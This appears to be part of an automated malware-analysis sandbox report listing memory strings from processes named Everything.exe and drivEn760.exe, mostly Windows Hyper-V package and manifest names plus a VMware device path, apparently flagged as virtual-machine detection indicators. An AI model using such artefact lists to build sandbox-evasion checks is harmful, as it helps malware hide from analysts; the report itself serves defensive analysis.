                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aMicrosoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UMicrosoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMicrosoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat'"
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SMicrosoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XMicrosoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.mum
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3.manifest`
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aMicrosoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda.manifestc
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790R*x
                                Source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2342771150.0000000005881000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V.Format.ps1xml
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Xamd64_microsoft-hyper-v-vid_31bf3856ad364e35_10.0.19041.1_none_56baaad119b4f126.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jamd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8.manifest_
                                Source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ewow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164.manifestx
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-h..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_53df9e1a6706366c.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum|
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Xamd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XMicrosoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum/
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmdebug.dll
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Microsoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mump
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790.manifesta
                                Source: Everything.exe, 00000014.00000003.2336839781.00000000052E1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V.sch
                                Source: Everything.exe, 00000014.00000003.2344012623.00000000059F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmci.inf
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WHyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum;
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_10.0.19041.1_none_5cb76f18a25ee556.manifest
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e2919819
                                Source: Everything.exe, 0000000A.00000003.2245320628.0000000000CC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lLSmwMtsDehncf|<&mrieldpGgPMLvDh sBpPfFL-&tbcreCo-whusndtpCWvTlhLwcob&B|(n-crjetgwfyhLlpxWsCvMcidzguSlntfrNsCe
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Zamd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c^G
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMicrosoft-Hyper-V-Hypervisor-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat%pH
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.catM%
                                Source: Everything.exe, 00000014.00000003.2331201128.0000000005D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmci.inf_amd64_68ed49469341f563g?P+
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vamd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \amd64_microsoft-hyper-v-storflt_31bf3856ad364e35_10.0.19041.1_none_cce38a03f1e40067.manifest~
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xMicrosoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Qamd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61q
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-p..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_8b1c06953b85da99.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RMicrosoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sMicrosoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xMicrosoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.mum
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PMicrosoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RMicrosoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat'"t
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sMicrosoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eamd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326
                                Source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2342771150.0000000005881000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V.Types.ps1xmlX
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat$"t
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0.manifestx
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMicrosoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.mum,
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f4751718744>
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Xamd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMicrosoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XMicrosoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2344012623.00000000059F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040j\J'1
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-f..wallrules.resources_31bf3856ad364e35_10.0.19041.1_en-us_4d711034023df04d.manifest]
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aamd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.19041.928_none_58e4b5397f9ab13a.manifestQD?I
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iamd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4.manifest
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aamd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YHyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Zamd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66|
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xml
                                Source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2342771150.0000000005881000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2336839781.00000000052E1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V.psd1
                                Source: drivEn760.exe, 00000003.00000002.2321750150.000000000065F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: damd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87|
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YHyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat'"
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gamd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2.manifest
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YMicrosoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1415.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79.manifest
                                Source: Everything.exe, 00000014.00000003.2357458657.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2336084286.000000000071B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q|+gMicrosoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981.manifesti
